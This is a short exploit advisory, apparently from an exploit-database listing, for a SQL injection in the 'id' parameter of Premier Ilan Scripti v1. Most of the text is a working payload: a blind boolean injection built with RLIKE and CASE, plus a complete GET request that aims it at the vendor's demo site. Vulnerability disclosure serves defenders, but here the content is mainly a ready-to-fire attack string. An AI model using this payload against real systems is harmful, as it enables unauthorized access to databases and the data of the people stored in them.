Share
===========================================================================================  
# Exploit Title: Premier Ilan Scripti - "id" SQL Inj.  
# Dork: N/A  
# Date: 29-06-2019  
# Exploit Author: Mehmet EMIROGLU  
# Vendor Homepage: http://v1.ilanscripti.org/  
# Software Link: http://v1.ilanscripti.org/  
# Version: v1  
# Category: Webapps  
# Tested on: Wamp64, Windows  
# CVE: N/A  
# Software Description:  
===========================================================================================  
# POC - SQLi  
# Parameters : id  
# Attack Pattern :  
%27/**/RLIKE/**/(case/**/when/**//**/8885330=8885330/**/then/**/0x74657374696E70757476616C7565/**/else/**/0x28/**/end)/**/and/**/'%'='  
# GET Method :  
http://v1.ilanscripti.org/kiralik-urunler-kategorino-6183.html?sayfa=kategorigoruntule&fiyat1=8100714&fiyat2=3695287&arama=Aramayı  
Daralt&durumu=0&sehir=0&ilce=0&sm=0&id=6183%27/**/RLIKE/**/(case/**/when/**//**/8885330=8885330/**/then/**/0x74657374696E70757476616C7565/**/else/**/0x28/**/end)/**/and/**/'%'='  
===========================================================================================